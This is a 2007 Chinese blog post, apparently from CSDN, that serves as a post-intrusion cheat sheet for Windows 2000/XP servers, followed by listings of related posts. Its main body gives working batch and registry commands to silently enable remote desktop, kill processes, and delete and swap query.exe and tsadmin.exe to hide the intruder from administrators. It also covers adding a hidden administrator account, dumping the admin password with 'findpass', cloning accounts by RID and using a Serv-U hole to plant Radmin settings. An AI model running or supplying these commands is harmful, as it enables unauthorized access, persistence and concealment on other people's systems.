2000 XP 开3389

原创 2007年09月23日 13:45:00
 

HTML Tags and JavaScript tutorial



2000 XP 开3389





echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>> 3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
 regedit /s 3389.reg
列举进程的脚本。
 
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts://./root/cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript ps.vbs
ntsd -c q -p 200
 
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
regedit /s 3389.reg
查询终端服务端口:reg query "HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-TCP-PortNumber"
 
 
登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
@copy c:/winnt/system32/query.exe c:/winnt/system32/com/1/que.exe
@del c:/winnt/system32/query.exe
@del %SYSTEMROOT%/system32/dllcache/query.exe
@copy c:/winnt/system32/com/1/query.exe c:/winnt/system32/query.exe //复制一个假的
@echo off
@copy c:/winnt/system32/tsadmin.exe c:/winnt/system32/com/1/tsadmin.exe
@del c:/winnt/system32/tsadmin.exe
@del %SYSTEMROOT%/system32/dllcache/tsadmin.exe
 
 
 
一些很有用的老知识
type c:/boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8
如果对方没开3389,但是装了Remote Administrator Service
用这个命令F:/ftp.exe "regedit -s F:/longyi.biz/RAdmin.reg" 连接
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:/ftp.exe "regedit -e F:/1.reg HKEY_LOCAL_MACHINE/SYSTEM/RAdmin"
 


xp/win7修改远程桌面端口号3389的方法,超级详细的哦!

首先
  • ansen125
  • ansen125
  • 2014年08月24日 17:44
  • 4767

Java GUI做简易计算器

貌似逻辑有点问题,界面还能用,凑合着看吧。。有空再改。。package calculator;/*公共类:calculator 功能:计算器界面 版本:1.0 Bill 201...
  • zhengzhaobb
  • zhengzhaobb
  • 2016年02月16日 11:21
  • 3029

修改服务器远程登录3389端口

WDS(Wireless Distribution System),无线分布式系统:是建构在HFSS或DSSS底下,可让基地台与基地台间得以沟通,比较不同的是有WDS的功能是可当无线网路的中继器,且可...
  • tfhui928
  • tfhui928
  • 2014年07月16日 13:12
  • 1384

各种奇葩3389连接不上的解决方法

整理一下各种3389连接不上的解决方法。 1、最经常出现的3389端口没开。 怎么看端口开没开呢。最简单的办法是netstat -an  查看是不是有127.0.0.1:3389有这行。如果有...
  • cc1988429
  • cc1988429
  • 2014年10月20日 22:57
  • 716

windows 2003 server 记录远程桌面的连接登录日志和修改3389连接端口方法

http://hi.baidu.com/cpucn/blog/item/f14f58db40654c6fd1164e42.html A。记录远程桌面的连接登录日志 echo off1、...
  • yongzhen150
  • yongzhen150
  • 2014年01月26日 11:37
  • 1197

关于远程服务器不能复制粘贴的解决方案

问题出现缘由:rdpclip 是指rdp协议(远程桌面协议),允许可以通过远程复制文件,如果你使用rdp(3389)远程连接别人或者被别人连接,通常这个进程都会启动,他的任务是可以通过远程复制信息和文...
  • qq_27445903
  • qq_27445903
  • 2017年06月05日 17:49
  • 328

利用JMeter进行Web测试(简介适合初学者)

http://www.blogjava.net/qileilove/archive/2012/04/09/373628.html 利用JMeter进行Web测试 JMeter介绍 脚本录制 ...
  • nashviller
  • nashviller
  • 2013年01月25日 10:55
  • 2689

[ZT]XP/2000鲜为人知的安全命令

2005-2-16 20:13:50  水冷天下 h2ol  出处:在Windows XP和Windows 2000系统中有一个我不一般不常用,但是功能强大的命令,那就是:syskey命令。这个命令可...
  • u014461454
  • u014461454
  • 2014年03月31日 17:34
  • 231

WindowsXP 登陆界面 如何从2000恢复成XP

http://blog.csdn.net/thewk/article/details/5254180 一、在运行中输入“gpedit.msc”,打开组策略,找到系统--登录的地方(即依次选择...
  • liyun123gx
  • liyun123gx
  • 2014年09月10日 18:04
  • 875

3389爆破服务器全过程与原理

3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat -an命令可以查看该端口的开启。对于一个账户如果账号密码过于弱很容易被爆破到...
  • yu0784123
  • yu0784123
  • 2013年06月19日 21:30
  • 1002
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:2000 XP 开3389
举报原因:
原因补充:

(最多只允许输入30个字)